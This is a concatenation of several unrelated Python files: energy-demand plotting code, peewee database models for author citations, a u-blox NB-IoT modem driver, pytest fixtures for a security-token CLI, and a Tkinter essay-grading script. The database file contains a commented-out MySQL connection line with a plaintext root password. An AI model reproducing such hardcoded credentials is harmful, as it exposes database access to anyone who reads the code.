results_container['load_factor_seasons'],
reg_nrs,
os.path.join(
result_paths['data_results_PDF'],
'lf_seasonal_{}.pdf'.format(fueltype_str)))'''
'''fig_lf.plot_lf_y(
fueltype_int,
fueltype_str,
results_container['reg_load_factor_yd'],
reg_nrs,
os.path.join(
result_paths['data_results_PDF'], 'lf_yd_{}.pdf'.format(fueltype_str)))'''
# reg_load_factor_yd = max daily value / average annual daily value
fig_lf.plot_lf_y(
fueltype_int,
fueltype_str,
results_container['reg_load_factor_y'],
reg_nrs,
os.path.join(
result_paths['data_results_PDF'],
'lf_y_{}.pdf'.format(fueltype_str)))
# --------------
# Fuel week of base year
# ----------------
if plot_crit['plot_week_h']:
fig_fuels_enduses_week.run(
results_resid=results_container['ed_fueltype_regs_yh'],
lookups=lookups,
hours_to_plot=range(7*24),
year_to_plot=2015,
fig_name=os.path.join(result_paths['data_results_PDF'], "tot_all_enduse03.pdf"))
# ------------------------------------
# Plot averaged per season and fueltype
# ------------------------------------
if plot_crit['plot_averaged_season_fueltype']:
for year in results_container['av_season_daytype_cy'].keys():
for fueltype_int in results_container['av_season_daytype_cy'][year].keys():
fueltype_str = tech_related.get_fueltype_str(
lookups['fueltypes'], fueltype_int)
fig_load_profile_dh_multiple.run(
path_fig_folder=result_paths['data_results_PDF'],
path_plot_fig=os.path.join(
result_paths['data_results_PDF'],
'season_daytypes_by_cy_comparison__{}__{}.pdf'.format(year, fueltype_str)),
calc_av_lp_modelled=results_container['av_season_daytype_cy'][year][fueltype_int], # current year
calc_av_lp_real=results_container['av_season_daytype_cy'][base_yr][fueltype_int], # base year
calc_lp_modelled=results_container['season_daytype_cy'][year][fueltype_int], # current year
calc_lp_real=results_container['season_daytype_cy'][base_yr][fueltype_int], # base year
plot_peak=True,
plot_all_entries=False,
plot_max_min_polygon=True,
plotshow=False,
plot_radar=plot_crit['plot_radar_seasonal'],
max_y_to_plot=120,
fueltype_str=fueltype_str,
year=year)
# ---------------------------------
# Plot hourly peak loads over time for different fueltypes
# --------------------------------
if plot_crit['plot_h_peak_fueltypes']:
fig_fuels_peak_h.run(
results_container['ed_fueltype_regs_yh'],
lookups,
os.path.join(
result_paths['data_results_PDF'],
'fuel_fueltypes_peak_h.pdf'))
print("finisthed plotting")
return
| 12,205 | 3,658 |
from playhouse.sqlite_ext import *
from playhouse.migrate import *
from peewee import *
# The initialisation
db = SqliteDatabase('../cache/iconic.db', pragmas={
'journal_mode': 'wal',
'cache_size': '-2000',
'fullfsync': 'on',
'journal_size_limit': '-1',
'threads': '8',
'foreign_keys': 1, # Enforce foreign-key constraints
})
# The initialisation
#network = MySQLDatabase('iconic', user='root', host='127.0.0.1', password='H@mst3rdigital')
class BaseModel(Model):
class Meta:
database = db
# class BaseNetwork(Model):
# class Meta:
# database = network
class Author(BaseModel):
id = BigIntegerField(unique=True, index=True, primary_key=True)
full_name = JSONField(null=True)
subject_areas = JSONField(null=True)
document_count = BigIntegerField(null=True)
cited_by_count = BigIntegerField(null=True)
citations_count = BigIntegerField(null=True)
h_index = BigIntegerField(null=True)
coauthors_count = BigIntegerField(null=True)
# Data about affiliation
affiliation_current = JSONField(null=True)
cat = JSONField(null=True)
country = JSONField(null=True)
docs_fetched = BooleanField(default=False)
last_page = BigIntegerField(null=True,default=0)
is_sample = BooleanField(default=False)
citations = JSONField(null=True)
class Collaboration(BaseModel):
abs_id = BigIntegerField(unique=True, index=True, primary_key=True)
authors = JSONField(null=True)
published = DateField(null=True)
cited_by = IntegerField(null=True)
keywords = JSONField(null=True)
coll_count = IntegerField(null=True)
message = TextField(null=True)
saved = BooleanField(default=False)
class Coauthors(BaseModel):
id = BigIntegerField(unique=True, index=True, primary_key=True)
co_list = JSONField(null=True)
last_page = IntegerField(null=True)
saved = BooleanField(default=False)
# class AuthorDetails(BaseNetwork):
# id = BigAutoField(unique=True, index=True, primary_key=True)
# full_name = TextField(null=True)
# preferred_name = TextField(null=True)
# affiliation_id = BigIntegerField(unique=True, index=True, null=True)
# url = TextField(null=True)
# class Network(BaseNetwork):
# id = BigAutoField(unique=True, index=True, primary_key=True)
# from_author = BigIntegerField(index=True)
# to_author = BigIntegerField(index=True)
# article = BigIntegerField(index=True)
# keywords = JSONField(null=True)
# year = IntegerField(null=True)
# citations = IntegerField(null=True)
# class Affiliation(BaseNetwork):
# url = TextField(null=True)
| 2,637 | 866 |
import time
import serial
import binascii
from collections import namedtuple
import logging
from ublox.socket import UDPSocket
logger = logging.getLogger(__name__)
Stats = namedtuple('Stats', 'type name value')
class CMEError(Exception):
"""CME ERROR on Module"""
class ATError(Exception):
"""AT Command Error"""
class ATTimeoutError(ATError):
"""Making an AT Action took to long"""
class ConnectionTimeoutError(ATTimeoutError):
"""Module did not connect within the specified time"""
class SaraN211Module:
"""
Represents a Ublox SARA N211 module.
Power-optimized NB-IoT (LTE Cat NB1) module.
"""
BAUDRATE = 9600
RTSCTS = False
AT_ENABLE_NETWORK_REGISTRATION = 'AT+CEREG=1'
AT_ENABLE_SIGNALING_CONNECTION_URC = 'AT+CSCON=1'
AT_ENABLE_POWER_SAVING_MODE = 'AT+NPSMR=1'
AT_ENABLE_ALL_RADIO_FUNCTIONS = 'AT+CFUN=1'
AT_REBOOT = 'AT+NRB'
AT_CLOSE_SOCKET = 'AT+NSOCL'
AT_GET_IP = 'AT+CGPADDR'
AT_SEND_TO = 'AT+NSOST'
AT_CHECK_CONNECTION_STATUS = 'AT+CSCON?'
AT_RADIO_INFORMATION = 'AT+NUESTATS="RADIO"'
REBOOT_TIME = 0
SUPPORTED_SOCKET_TYPES = ['UDP']
def __init__(self, serial_port: str, roaming=False, echo=False):
self._serial_port = serial_port
self._serial = serial.Serial(self._serial_port, baudrate=self.BAUDRATE,
rtscts=self.RTSCTS, timeout=5)
self.echo = echo
self.roaming = roaming
self.ip = None
self.connected = False
self.sockets = {}
self.available_messages = list()
self.imei = None
# TODO: make a class containing all states
self.registration_status = 0
self.radio_signal_power = None
self.radio_total_power = None
self.radio_tx_power = None
self.radio_tx_time = None
self.radio_rx_time = None
self.radio_cell_id = None
self.radio_ecl = None
self.radio_snr = None
self.radio_earfcn = None
self.radio_pci = None
self.radio_rsrq = None
self.radio_rsrp = None
def reboot(self):
"""
Rebooting the module. Will run the AT_REBOOT command and also flush the
serial port to get rid of trash input from when the module restarted.
"""
logger.info('Rebooting module')
self._at_action(self.AT_REBOOT)
logger.info('waiting for module to boot up')
time.sleep(self.REBOOT_TIME)
self._serial.flushInput() # Flush the serial ports to get rid of crap.
self._serial.flushOutput()
logger.info('Module rebooted')
def setup(self):
"""
Running all commands to get the module up an working
"""
logger.info(f'Starting initiation process')
self.enable_signaling_connection_urc()
self.enable_network_registration()
self.enable_psm_mode()
self.enable_radio_functions()
logger.info(f'Finished initiation process')
def enable_psm_mode(self):
"""
Enable Power Save Mode
"""
self._at_action(self.AT_ENABLE_POWER_SAVING_MODE)
logger.info('Enabled Power Save Mode')
def enable_signaling_connection_urc(self):
"""
Enable Signaling Connection URC
"""
self._at_action(self.AT_ENABLE_SIGNALING_CONNECTION_URC)
logger.info('Signaling Connection URC enabled')
def enable_network_registration(self):
"""
Enable Network registration
"""
self._at_action(self.AT_ENABLE_NETWORK_REGISTRATION)
logger.info('Network registration enabled')
def enable_radio_functions(self):
"""
Enable all radio functions.
"""
self._at_action(self.AT_ENABLE_ALL_RADIO_FUNCTIONS)
logger.info('All radio functions enabled')
def connect(self, operator: int, roaming=False):
"""
Will initiate commands to connect to operators network and wait until
connected.
"""
logger.info(f'Trying to connect to operator {operator} network')
# TODO: Handle connection independent of home network or roaming.
if operator:
at_command = f'AT+COPS=1,2,"{operator}"'
else:
at_command = f'AT+COPS=0'
self._at_action(at_command, timeout=300)
self._await_connection(roaming or self.roaming)
logger.info(f'Connected to {operator}')
def create_socket(self, socket_type='UDP', port: int = None):
"""
Will return a socket-like object that mimics normal python
sockets. The socket will then translate the commands to correct method
calls on the module.
It will also register the socket on the module class so that they can be
reused in the future if they are not closed.
:param socket_type:
:param port:
:return: UbloxSocket
"""
logger.info(f'Creating {socket_type} socket')
if socket_type.upper() not in self.SUPPORTED_SOCKET_TYPES:
raise ValueError(f'Module does not support {socket_type} sockets')
sock = None
if socket_type.upper() == 'UDP':
sock = self._create_upd_socket(port)
elif socket_type.upper() == 'TCP':
sock = self._create_tcp_socket(port)
logger.info(f'{socket_type} socket created')
self.sockets[sock.socket_id] = sock
return sock
def _create_upd_socket(self, port):
"""
Will create a UDP-socket for the N211 module
"""
at_command = f'AT+NSOCR="DGRAM",17'
if port:
at_command = at_command + f',{port}'
socket_id = self._at_action(at_command)
sock = UDPSocket(socket_id, self, port)
return sock
def _create_tcp_socket(self, port):
"""
N211 module only supports UDP.
"""
raise NotImplementedError('Sara211 does not support TCP')
def close_socket(self, socket_id):
"""
Will send the correct AT action to close specified socket and remove
the reference of it on the module object.
"""
logger.info(f'Closing socket {socket_id}')
if socket_id not in self.sockets.keys():
raise ValueError('Specified socket id does not exist')
result = self._at_action(f'{self.AT_CLOSE_SOCKET}={socket_id}')
del self.sockets[socket_id]
return result
def send_udp_data(self, socket: int, host: str, port: int, data: str):
"""
Send a UDP message
"""
logger.info(f'Sending UDP message to {host}:{port} : {data}')
_data = binascii.hexlify(data.encode()).upper().decode()
length = len(data)
atc = f'{self.AT_SEND_TO}={socket},"{host}",{port},{length},"{_data}"'
result = self._at_action(atc)
return result
def receive_udp_data(self):
"""
Recieve a UDP message
"""
logger.info(f'Waiting for UDP message')
self._read_line_until_contains('+NSONMI')
message_info = self.available_messages.pop(0)
message = self._at_action(f'AT+NSORF={message_info.decode()}')
response = self._parse_udp_response(message[0])
logger.info(f'Recieved UDP message: {response}')
return response
def _at_action(self, at_command, timeout=10, capture_urc=False):
"""
Small wrapper to issue a AT command. Will wait for the Module to return
OK. Some modules return answers to AT actions as URC:s before the OK
and to handle them as IRCs it is possible to set the capture_urc flag
and all URCs between the at action and OK will be returned as result.
"""
logger.debug(f'Applying AT Command: {at_command}')
self._write(at_command)
time.sleep(0.02) # To give the end devices some time to answer.
irc = self._read_line_until_contains('OK', timeout=timeout,
capture_urc=capture_urc)
if irc is not None:
logger.debug(f'AT Command response = {irc}')
return irc
def _write(self, data):
"""
Writing data to the module is simple. But it needs to end with \r\n
to accept the command. The module will answer with an empty line as
acknowledgement. If echo is enabled everything that the is sent to the
module is returned in the serial line. So we just need to omit it from
the acknowledge.
"""
data_to_send = data
if isinstance(data, str): # if someone sent in a string make it bytes
data_to_send = data.encode()
if not data_to_send.endswith(b'\r\n'):
# someone didnt add the CR an LN so we need to send it
data_to_send += b'\r\n'
# start_time = time.time()
self._serial.write(data_to_send)
time.sleep(0.02) # To give the module time to respond.
logger.debug(f'Sent: {data_to_send}')
ack = self._serial.read_until()
logger.debug(f'Recieved ack: {ack}')
if self.echo:
# when echo is on we will have recieved the message we sent and
# will get it in the ack response read. But it will not send \n.
# so we can omitt the data we send + i char for the \r
_echo = ack[:-2]
wanted_echo = data_to_send[:-2] + b'\r'
if _echo != wanted_echo:
raise ValueError(f'Data echoed from module: {_echo} is not the '
f'same data as sent to the module')
ack = ack[len(wanted_echo):]
if ack != b'\r\n':
raise ValueError(f'Ack was not received properly, received {ack}')
@staticmethod
def _remove_line_ending(line: bytes):
"""
To not have to deal with line endings in the data we can use this to
remove them.
"""
if line.endswith(b'\r\n'):
return line[:-2]
else:
return line
def _read_line_until_contains(self, slice, capture_urc=False, timeout=5):
"""
Similar to read_until, but will read whole lines so we can use proper
timeout management. Any URC:s that is read will be handled and we will
return the IRC:s collected. If capture_urc is set we will return all
data as IRCs.
"""
_slice = slice
if isinstance(slice, str):
_slice = slice.encode()
data_list = list()
irc_list = list()
start_time = time.time()
while True:
try:
data = self._serial.read_until()
except serial.SerialTimeoutException:
# continue to read lines until AT Timeout
duration = time.time() - start_time
if duration > timeout:
raise ATTimeoutError
continue
line = self._remove_line_ending(data)
if line.startswith(b'+'):
if capture_urc:
irc_list.append(line) # add the urc as an irc
else:
self._process_urc(line)
elif line == b'OK':
pass
elif line.startswith(b'ERROR'):
raise ATError('Error on AT Command')
elif line == b'':
pass
else:
irc_list.append(line) # the can only be an IRC
if _slice in line:
data_list.append(line)
break
else:
data_list.append(line)
duration = time.time() - start_time
if duration > timeout:
raise ATTimeoutError
clean_list = [response for response in data_list if not response == b'']
logger.debug(f'Received: {clean_list}')
return irc_list
@staticmethod
def _parse_udp_response(message: bytes):
_message = message.replace(b'"', b'')
socket, ip, port, length, _data, remaining_bytes = _message.split(b',')
data = bytes.fromhex(_data.decode())
return data
def _process_urc(self, urc: bytes):
"""
URC = unsolicited result code
When waiting on answer from the module it is possible that the module
sends urcs via +commands. So after the urcs are
collected we run this method to process them.
"""
_urc = urc.decode()
logger.debug(f'Processing URC: {_urc}')
urc_id = _urc[1:_urc.find(':')]
if urc_id == 'CSCON':
self._update_connection_status_callback(urc)
elif urc_id == 'CEREG':
self._update_eps_reg_status_callback(urc)
elif urc_id == 'CGPADDR':
self._update_ip_address_callback(urc)
elif urc_id == 'NSONMI':
self._add_available_message_callback(urc)
elif urc_id == 'CME ERROR':
self._handle_cme_error(urc)
else:
logger.debug(f'Unhandled urc: {urc}')
def _handle_cme_error(self, urc: bytes):
"""
Callback to raise CME Error.
"""
raise CMEError(urc.decode())
def _add_available_message_callback(self, urc: bytes):
"""
Callback to handle recieved messages.
"""
_urc, data = urc.split(b':')
result = data.lstrip()
logger.debug(f'Recieved data: {result}')
self.available_messages.append(result)
def update_radio_statistics(self):
"""
Read radio statistics and update the module object.
"""
radio_data = self._at_action(self.AT_RADIO_INFORMATION)
self._parse_radio_stats(radio_data)
def _update_connection_status_callback(self, urc):
"""
In the AT urc +CSCON: 1 the last char is indication if the
connection is idle or connected
"""
status = bool(int(urc[-1]))
self.connected = status
logger.info(f'Changed the connection status to {status}')
def _update_eps_reg_status_callback(self, urc):
"""
The command could return more than just the status.
Maybe a regex would be good
But for now we just check the last as int
"""
status = int(chr(urc[-1]))
self.registration_status = status
logger.info(f'Updated status EPS Registration = {status}')
def _update_ip_address_callback(self, urc: bytes):
"""
Update the IP Address of the module
"""
# TODO: this is per socket. Need to implement socket handling
_urc = urc.decode()
ip_addr = _urc[(_urc.find('"') + 1):-1]
self.ip = ip_addr
logger.info(f'Updated the IP Address of the module to {ip_addr}')
def _parse_radio_stats(self, irc_buffer):
"""
Parser for radio statistic result
"""
stats = [self._parse_radio_stats_string(item) for item in irc_buffer]
for stat in stats:
if not stat:
continue
if stat.type == 'RADIO' and stat.name == 'Signal power':
self.radio_signal_power = stat.value
elif stat.type == 'RADIO' and stat.name == 'Total power':
self.radio_total_power = stat.value
elif stat.type == 'RADIO' and stat.name == 'TX power':
self.radio_tx_power = stat.value
elif stat.type == 'RADIO' and stat.name == 'TX time':
self.radio_tx_time = stat.value
elif stat.type == 'RADIO' and stat.name == 'RX time':
self.radio_rx_time = stat.value
elif stat.type == 'RADIO' and stat.name == 'Cell ID':
self.radio_cell_id = stat.value
elif stat.type == 'RADIO' and stat.name == 'ECL':
self.radio_ecl = stat.value
elif stat.type == 'RADIO' and stat.name == 'SNR':
self.radio_snr = stat.value
elif stat.type == 'RADIO' and stat.name == 'EARFCN':
self.radio_earfcn = stat.value
elif stat.type == 'RADIO' and stat.name == 'PCI':
self.radio_pci = stat.value
elif stat.type == 'RADIO' and stat.name == 'RSRQ':
self.radio_rsrq = stat.value
else:
logger.debug(f'Unhandled statistics data: {stat}')
@staticmethod
def _parse_radio_stats_string(stats_byte_string: bytes):
"""
The string is like: b'NUESTATS: "RADIO","Signal power",-682'
:param stats_byte_string:
:return: NamedTuple Stats
"""
parts = stats_byte_string.decode().split(':')
irc: str = parts[0].strip()
data: str = parts[1].strip().replace('"', '')
data_parts = data.split(',')
if irc == 'NUESTATS':
return Stats(data_parts[0], data_parts[1], int(data_parts[2]))
else:
return None
def __repr__(self):
return f'NBIoTModule(serial_port="{self._serial_port}")'
def _await_connection(self, roaming, timeout=180):
"""
The process to verify that connection has occured is a bit different on
different devices. On N211 we need to wait intil we get the +CERREG: x
URC.
"""
logging.info(f'Awaiting Connection')
if roaming:
self._read_line_until_contains('CEREG: 5')
else:
self._read_line_until_contains('CEREG: 1')
class SaraR4Module(SaraN211Module):
"""
Represents a Ublox SARA R4XX module.
"""
BAUDRATE = 115200
RTSCTS = 1
DEFAULT_BANDS = [20]
AT_CREATE_UDP_SOCKET = 'AT+USOCR=17'
AT_CREATE_TCP_SOCKET = 'AT+USOCR=6'
AT_ENABLE_LTE_M_RADIO = 'AT+URAT=7'
AT_ENABLE_NBIOT_RADIO = 'AT+URAT=8'
AT_CLOSE_SOCKET = 'AT+USOCL'
AT_REBOOT = 'AT+CFUN=15' # R4 specific
REBOOT_TIME = 10
SUPPORTED_SOCKET_TYPES = ['UDP', 'TCP']
SUPPORTED_RATS = {'NBIOT': AT_ENABLE_NBIOT_RADIO,
'LTEM': AT_ENABLE_LTE_M_RADIO}
def __init__(self, serial_port: str, roaming=False, echo=True):
super().__init__(serial_port, roaming, echo)
self.current_rat = None
def setup(self, radio_mode='NBIOT'):
"""
Running all commands to get the module up an working
"""
self.read_imei()
self.set_radio_mode(mode=radio_mode)
self.enable_radio_functions()
self.enable_network_registration()
self.set_error_format()
self.set_data_format()
self.enable_quality_reporting()
def set_data_format(self):
self._at_action('AT+UDCONF=1,1') # Set data format to HEX
logger.info('Data format set to HEX')
def read_imei(self):
logger.info('Reading IMEI from module')
result = self._at_action('AT+CGSN')
self.imei = int(result[0])
def set_error_format(self):
self._at_action('AT+CMEE=2') # enable verbose errors
logger.info('Verbose errors enabled')
def set_band_mask(self, bands: list = None):
"""
Band is set using a bit for each band. Band 1=bit 0, Band 64=Bit 63
.. note:
Only supports NB IoT RAT.
"""
logger.info(f'Setting Band Mask for bands {bands}')
bands_to_set = bands or self.DEFAULT_BANDS
total_band_mask = 0
for band in bands_to_set:
individual_band_mask = 1 << (band - 1)
total_band_mask = total_band_mask | individual_band_mask
self._at_action(f'AT+UBANDMASK=1,{total_band_mask},{total_band_mask}')
def enable_quality_reporting(self):
logger.info('Enables reporting of RSRP and RSRQ via AT+UCGED')
self._at_action('AT+UCGED=5')
def set_radio_mode(self, mode):
response = self._at_action(self.SUPPORTED_RATS[mode.upper()])
logger.info(f'Radio Mode set to {mode}')
self.current_rat = mode.upper()
return response
def set_pdp_context(self, apn, pdp_type="IP", cid=1):
logger.info(f'Setting PDP Context')
_at_command = f'AT+CGDCONT={cid},"{pdp_type}","{apn}"'
self._at_action(_at_command)
logger.info(f'PDP Context: {apn}, {pdp_type}')
def update_radio_statistics(self):
"""
On the R4xx only rsrp and rsrq is available.
"""
result = self._at_action('AT+UCGED?', capture_urc=True)
cell_id = None
channel_nr = None
rsrq = None
rsrp = None
try:
for item in result:
data = item[7:] # remove the data description
if data.endswith(b'\r'):
data = data[:-2]
else:
data = data[:-1]
if item.startswith(b'+RSRQ'):
cell_id, channel_nr, rsrq = data.split(b',')
elif item.startswith(b'+RSRP'):
cell_id, channel_nr, rsrp = data.split(b',')
self.radio_earfcn = channel_nr
self.radio_cell_id = cell_id
self.radio_rsrp = float(rsrp.decode().replace('"', ''))
self.radio_rsrq = float(rsrq.decode().replace('"', ''))
except ValueError as e:
logger.info('Error in parsing radio statistics')
def _create_upd_socket(self, port):
at_command = f'{self.AT_CREATE_UDP_SOCKET}'
if port:
at_command = at_command + f',{port}'
response = self._at_action(at_command, capture_urc=True)
socket_id = int(chr(response[0][-1]))
sock = UDPSocket(socket_id, self, port)
self.sockets[sock.socket_id] = sock
return sock
def send_udp_data(self, socket: int, host: str, port: int, data: str):
"""
Send a UDP message
"""
logger.info(f'Sending UDP message to {host}:{port} : {data}')
_data = binascii.hexlify(data.encode()).upper().decode()
length = len(data)
atc = f'AT+USOST={socket},"{host}",{port},{length},"{_data}"'
result = self._at_action(atc)
return result
def read_udp_data(self, socket, length, timeout=10):
"""
Reads data from a udp socket.
..note
there is an issue on the R410 module that it is not issuing URCs
So to get the data we poll for data until we get some.
"""
start_time = time.time()
while True:
time.sleep(2)
data = self._at_action(f'AT+USORF={socket},{length}',
capture_urc=True)
result = data[0].replace(b'"', b'').split(b',')[1:] # remove URC
if result[0]: # the IP address part
return result
duration = time.time() - start_time
if duration > timeout:
break
logger.info('No UDP response read')
return None
def set_listening_socket(self, socket: int, port: int):
"""Set a socket into listening mode to be able to receive data on
the socket."""
self._at_action(f'AT+USOLI={socket},{port}')
def _await_connection(self, roaming, timeout=180):
"""
The process to verify that connection has occurred is a bit different on
different devices. On R4xx we need continuously poll the connection
status and see if the connection status has changed.
"""
logging.info(f'Awaiting Connection')
start_time = time.time()
while True:
time.sleep(2)
self._at_action('AT+CEREG?')
if self.registration_status == 0:
continue
if roaming and self.registration_status == 5:
break
if (not roaming) and self.registration_status == 1:
break
elapsed_time = time.time() - start_time
if elapsed_time > timeout:
raise ConnectionTimeoutError(f'Could not connect')
| 23,977 | 7,428 |
import pytest
from sto.distribution import read_csv
from sto.ethereum.issuance import contract_status
from sto.ethereum.status import update_status
from sto.ethereum.tokenscan import token_scan
from sto.generic.captable import generate_cap_table, print_cap_table
from sto.models.implementation import TokenScanStatus, TokenHolderAccount
from sto.identityprovider import NullIdentityProvider
from sto.cli.main import cli
@pytest.fixture(params=['unrestricted', 'restricted'])
def sample_token(
logger,
dbsession,
web3,
private_key_hex,
sample_csv_file,
db_path,
click_runner,
get_contract_deployed_tx,
kyc_contract,
monkeypatch_get_contract_deployed_tx,
request
):
"""Create a security token used in these tests."""
if request.param == 'restricted':
from sto.ethereum.utils import priv_key_to_address
# whitelist owner
result = click_runner.invoke(
cli,
[
'--database-file', db_path,
'--ethereum-private-key', private_key_hex,
'--ethereum-gas-limit', 999999999,
'kyc-manage',
'--whitelist-address', priv_key_to_address(private_key_hex)
]
)
assert result.exit_code == 0
result = click_runner.invoke(
cli,
[
'--database-file', db_path,
'--ethereum-private-key', private_key_hex,
'--ethereum-gas-limit', 999999999,
'issue',
'--name', "Moo Corp",
'--symbol', "MOO",
'--url', "https://tokenmarket.net",
'--amount', 9999,
'--transfer-restriction', request.param
]
)
assert result.exit_code == 0
result = click_runner.invoke(
cli,
[
'--database-file', db_path,
'--ethereum-private-key', private_key_hex,
'--ethereum-gas-limit', 999999999,
'tx-broadcast',
]
)
assert result.exit_code == 0
token_address = get_contract_deployed_tx(dbsession, "SecurityToken").contract_address
# Check that we can view the token status
status = contract_status(logger,
dbsession,
"testing",
web3,
ethereum_abi_file=None,
ethereum_private_key=private_key_hex,
ethereum_gas_limit=None,
ethereum_gas_price=None,
token_contract=token_address,
)
assert status["name"] == "Moo Corp"
assert status["totalSupply"] == 9999 * 10 ** 18
dbsession.commit()
return token_address
@pytest.fixture
def scanned_distribution(logger, dbsession, web3, private_key_hex, sample_csv_file, sample_token, click_runner, db_path, monkeypatch_create_web3):
"""Create some sample transactions so we can scan the token holder balances."""
token_address = sample_token
entries = read_csv(logger, sample_csv_file)
for entry in entries:
# whitelist customers
result = click_runner.invoke(
cli,
[
'--database-file', db_path,
'--ethereum-private-key', private_key_hex,
'--ethereum-gas-limit', 999999999,
'kyc-manage',
'--whitelist-address', entry.address
]
)
assert result.exit_code == 0
result = click_runner.invoke(
cli,
[
'--database-file', db_path,
'--ethereum-private-key', private_key_hex,
'--ethereum-gas-limit', 999999999,
"distribute-multiple",
'--csv-input', sample_csv_file,
'--address', token_address
]
)
assert result.exit_code == 0
result = click_runner.invoke(
cli,
[
'--database-file', db_path,
'--ethereum-private-key', private_key_hex,
'--ethereum-gas-limit', 999999999,
'tx-broadcast',
]
)
assert result.exit_code == 0
# Check they got mined
# Send transactions to emphmereal test chain
result = click_runner.invoke(
cli,
[
'--database-file', db_path,
'--ethereum-private-key', private_key_hex,
'--ethereum-gas-limit', 999999999,
'tx-broadcast',
]
)
assert result.exit_code == 0
# Check they got mined
txs = update_status(
logger,
dbsession,
"testing",
web3,
ethereum_private_key=private_key_hex,
ethereum_gas_limit=None,
ethereum_gas_price=None,
)
# Check that rerun does not recreate txs
result = click_runner.invoke(
cli,
[
'--database-file', db_path,
'--ethereum-private-key', private_key_hex,
'--ethereum-gas-limit', 999999999,
"distribute-multiple",
'--csv-input', sample_csv_file,
'--address', token_address
]
)
assert result.exit_code == 0
result = click_runner.invoke(
cli,
[
'--database-file', db_path,
'--ethereum-private-key', private_key_hex,
'--ethereum-gas-limit', 999999999,
'tx-broadcast',
]
)
assert result.exit_code == 0
token_scan(logger, dbsession, "testing", web3, None, token_address)
return token_address
def test_cap_table_formats(logger, dbsession, network, scanned_distribution, web3):
"""We format cap tables with different orderings."""
identity_provider = NullIdentityProvider()
token_address = scanned_distribution
for sort_direction in ["asc", "desc"]:
for sort_order in ["address", "name", "balance", "updated"]:
generate_cap_table(
logger,
dbsession,
token_address,
order_by=sort_order,
identity_provider=identity_provider,
order_direction=sort_direction,
include_empty=False,
TokenScanStatus=TokenScanStatus,
TokenHolderAccount=TokenHolderAccount,
)
def test_cap_table_printer(logger, dbsession, network, scanned_distribution, web3):
"""We print cap tables with different orderings."""
identity_provider = NullIdentityProvider()
token_address = scanned_distribution
table = generate_cap_table(
logger,
dbsession,
token_address,
order_by="balance",
identity_provider=identity_provider,
include_empty=False,
order_direction="desc",
TokenScanStatus=TokenScanStatus,
TokenHolderAccount=TokenHolderAccount
)
print_cap_table(table, max_entries=1000, accuracy=2)
| 6,965 | 2,098 |
from __future__ import absolute_import
from __future__ import print_function
import six
import language_check
from tkinter import *
from tkinter import messagebox
import rake
import operator
import io
counter=1
file=open("questions.txt","r")
q=[line.rstrip('\n') for line in file]
totmark=[0,0,0,0,0,0]
def nex():
global counter
if(counter<6):
counter=counter+1
ques.set(str(q[counter-1]))
else:
messagebox.showwarning("Limit Exceeded","Sorry, No more questions available!")
#print(counter)
def prev():
global counter
if(counter>1):
counter=counter-1
ques.set(str(q[counter-1]))
else:
messagebox.showwarning("Limit Exceeded","This is the first question!")
#print(counter)
def finish():
s=0
for i in totmark:
s=s+i
messagebox.showinfo("Total Score","The total score obtained in the test="+str(s)+"/40")
def enFunc():
global counter
ans = entry.get('1.0','end')
n=0
for line in ans:
words=[line.split(' ') for line in ans]
n=len(words)
if(counter==1 or counter==2):
if(n>=850):
marks1=10
elif(n>=400):
marks1=5
else:
marks1=3
else:
if(n>=250):
marks1=10
elif(n>=100):
marks1=5
else:
marks1=3
a=marks1
fname="data/docs/mp"+str(counter)+".txt"
stoppath = "data/stoplists/SmartStoplist.txt"
rake_object = rake.Rake(stoppath)
sample_file = io.open(fname, 'r',encoding="iso-8859-1")
text = ans
sentenceList = rake.split_sentences(text)
#for sentence in sentenceList:
# print("Sentence:", sentence)
stopwords = rake.load_stop_words(stoppath)
stopwordpattern = rake.build_stop_word_regex(stoppath)
phraseList = rake.generate_candidate_keywords(sentenceList, stopwordpattern, stopwords)
#print("Phrases:", phraseList)
wordscores = rake.calculate_word_scores(phraseList)
keywordcandidates = rake.generate_candidate_keyword_scores(phraseList, wordscores)
"""for candidate in keywordcandidates.keys():
print("Candidate: ", candidate, ", score: ", keywordcandidates.get(candidate))
sortedKeywords = sorted(six.iteritems(keywordcandidates), key=operator.itemgetter(1), reverse=True)
totalKeywords = len(sortedKeywords)
for keyword in sortedKeywords[0:int(totalKeywords/3)]:
print("Keyword: ", keyword[0], ", score: ", keyword[1])"""
keyw=dict(rake_object.run(text))
print(keyw)
#l1=len(keyw)
print(fname)
f1=io.open(fname, 'r',encoding="iso-8859-1")
text1=f1.read()
que=text1.split("\n")
print(que[0])
l=text1.split("\n\n")
kw=l[2].split("\n")
print("keyword in original file=",kw)
total=len(kw)
print("No of keywords in original file=",total)
c=0
for i in keyw:
for j in range(0,total):
if(kw[j].lower() in i.lower()):
print("Detected= " +str(i))
c=c+1
print("count=",c)
percentage=(c/total)*100
if(percentage>=90):
marks2=30
message = "Marks obtained for keyword:" + str(marks2) + "/30"
elif(percentage>=80 and percentage<90):
marks2=28
message = "Marks obtained for keyword:"+ str(marks2) + "/30"
elif(percentage>=70 and percentage<80):
marks2=26
message = "Marks obtained for keyword:" + str(marks2) + "/30"
elif(percentage>=60 and percentage<80):
marks2=24
message = "Marks obtained for keyword:" + str(marks2) + "/30"
elif(percentage>=50 and percentage<60):
marks2=28
message = "Marks obtained for keyword:" + str(marks2) + "/30"
elif(percentage>=40 and percentage<50):
marks2=25
message = "Marks obtained for keyword:" + str(marks2) + "/30"
else:
marks2 = 0
message = "Marks obtained for keyword:" + str(marks2) + "/30"
mes2text = "\nMarks for length = " + str(a) + "/10" + "\nLength = " + str(n)
print(mes2text)
print(message)
b=marks2
tool=language_check.LanguageTool('en-US')
count=0
text=str(ans)
txtlen=len(text.split())
setxt = set(text.split())
setlen = len(setxt)
matches=tool.check(text)
#print("Error:",matches)
print("No. of Errors=",len(matches))
noOfError=len(matches)
for i in range (0,noOfError):
print(matches[i].msg)
if (noOfError<=3 and n>0):
marks3=10
elif (noOfError<=5):
marks3=8
elif (noOfError<=8):
marks3=5
else:
marks3=3
print("Marks obtained after parsing=",marks3,"/10")
c=marks3
d=a+b+c
print("Marks obtained out of 50 is=",d,"/50")
if(counter==1 or counter==2):
tot=(d/50)*12
else:
tot=(d/50)*4
m="\nMarks obtained for this question is"+str(tot)
messagebox.showinfo("Result",m)
global totmark
totmark[counter-1]=tot
root = Tk()
root.geometry('800x1800')
label= Label(root,text="ANSWER ALL THE FOLLOWING QUESTIONS",bg="lightyellow",bd=20)
label.place(x=300,y=10)
ques= StringVar()
ques.set(str(q[counter-1]))
labelQ=Label(root,textvariable=ques,text=str(q[0]),width=100, bg="lightyellow", bd=20)
labelQ.place(x=10,y=100)
